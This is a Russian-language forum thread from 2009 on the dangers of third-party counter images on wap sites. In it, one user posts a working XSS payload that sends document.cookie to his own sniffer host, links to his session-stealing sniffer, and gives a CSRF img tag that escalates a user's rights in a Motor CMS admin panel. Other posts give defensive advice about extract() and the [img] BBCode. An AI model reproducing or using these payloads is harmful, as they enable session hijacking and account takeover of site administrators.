Чем опасны "левые" счетчики

Тема закрыта
653
.
угу, хорошо что затронули эту тему не зря вчера по общались..
.
а вот вам и пример http://vipwap.pp.ru/public_sniffer/s.gif та картинка, а лог снифера вот http://vipwap.pp.ru/public_sniffer
а это и сама картинка
.
но тот снифер игрушка, по сравнению с моей модификацией хе хе
http://vipwap.pp.ru/sniffer/cookies.php этот тырит и сессию, осталось найти пассивную xss и заюзать
<script>img = new Image(); img.src = "http://vipwap.pp.ru/sniffer/xss.php?z="+ document.cookie;</script>
.
но тырить можно не только сессию, но и подавать все возможные запросы, к примеру вот такой запрос для мотора
<img src="http://wm.vipwap.pp.ru/mpanel/users.php?action=edit&users=Tzeentch&action=upgrade&udd1=00a26a00&udd4=email@mail.ru&udd7=101&udd6=12.06.2009" height="1" width="1">
а сам код можит находитсо на любом удаленном сервере гг лишбы браузер админа держал сессию
============
Олег, мож я написал лишнего, тогда удали этот пост, хотя я не раз выносил это на паблик.
.
когда будите читать о xss, почитайте и о SSL (уровень защещенных соккетов)
.
Tzeentch
но мона и не во вред это пускать. а банеры крутить
echo '<img src="http://b.zadanie.biz/bansg.php?uid=183884" height="1" width="1">';
какой безобидный тег <img а примемений ему куча, если с умом подойти
.
AlkatraZ (12.06.2009/15:04)
Можно, но это нужно отдельно изучать данный вопрос.
Я пока этим не занимался и поэтому не могу дать точный ответ.
---
Поюзайте сами Гугл на тему "XSS уязвимость"
Олег, а если сделать исходящие ссылки через редерект? и при этом
редирект накрывать через
extract($HTTP_GET_VARS);
extract($HTTP_POST_VARS);
extract($HTTP_COOKIE_VARS);
extract($HTTP_SERVER_VARS);
extract($HTTP_SESSION_VARS);
Тогда хакеру ни куков ни достанится ни сессии. и еще через wml зделать, так как wml ни фига ни чего не передает.
.
╭∩╮ (`-`) ╭∩╮
Krite (14.06.2009/23:29)
Олег, а если сделать исходящие ссылки через редерект? и при этом
редирект накрывать через
extract($HTTP_GET_VARS);
extract($HTTP_POST_VARS);
extract($HTTP_COOKIE_VARS);
extract($HTTP_SERVER_VA
Да ты что???

extract - в нем все зло, из-за него столько ломали Мотор.
---
Даже в официальном мануале по РНР, КРАСНЫМ шрифтом указано, что "Do not use extract() on untrusted data", то есть, не применяйте к непроверенным данным.
Иными словами, если ты будешь применять extract(), теряется все преимущество register_globals OFF

Уважаемые, учите матчасть, читайте официальные мануалы!
.
AlkatraZ (15.06.2009/00:22)
Да ты что???

extract - в нем все зло, из-за него столько ломали Мотор.
---
Даже в официальном мануале по РНР, КРАСНЫМ шрифтом указано, что "Do not use extract() on untrusted data", то ест
Хм. Извиняюсь тады за это.
.
AlkatraZ (12.06.2009/12:45)
Не, там скорее всего была ситуация в том. что горе-хозяин сайта включил ББкод [img] а я ведь МНОГО раз предупреждал о его опасности.
А как и где включить/выключить ББкод [img]?
Всего: 21